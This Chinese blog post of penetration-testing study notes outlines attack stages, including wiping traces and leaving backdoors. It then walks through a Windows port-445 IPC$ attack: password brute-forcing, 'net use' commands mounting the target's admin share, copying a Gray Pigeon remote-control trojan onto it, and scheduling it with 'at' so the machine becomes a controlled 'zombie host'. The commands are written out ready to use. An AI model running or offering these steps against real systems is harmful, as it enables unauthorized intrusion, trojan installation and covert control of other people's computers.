[网络安全学习篇9]:渗透测试 day9

绝地灬酷狼 2022-12-19 11:40 299阅读 0赞

目录

渗透测试

渗透测试

0、授权

1、信息收集

nslookup whois

2、扫描漏洞

namp = ip范围 端口 80(IIS,apache,什么网站)

scanpot

高级扫描:如IIS漏洞2003-IIS6.0 2008-IIS7.0

扫描网站漏洞

3、漏洞利用

4、提权(shell(命令行cmd)环境、桌面环境、最高权限)

5、毁尸灭迹

6、留后门

7、渗透测试报告

手工测试端口号开放:

telnet IP 地址 测试端口

445漏洞利用之一IPC$

1、scanport 扫描445端口

2、进行暴力破解:NTscan

3、真空密码生成器、亦思社会工程学密码生成器

  1. net use f: \\10.1.1.2\ipc$ 密码 /user:用户
  2. =================================================
  3. net use f: \\10.1.1.2\share 密码 /user:用户
  4. net use * /del
  5. net use * /del
  6. net use f: \\10.1.1.2\c$ 密码 /user:用户
  7. =================================================

4、制作木马 (灰鸽子远程控制 黑防专版)

5、植入木马(留后门)

  1. copy d:\heihei.exe \\10.1.1.2\c$

6、设计计划任务自动执行木马:

  1. net time \\10.1,1.2
  2. at \\10.1.1.2 11:11 "c:\heihei.exe"

7、等待肉鸡上线

发表评论

表情:
评论列表 (有 0 条评论,299人围观)

还没有评论,来说两句吧...

相关阅读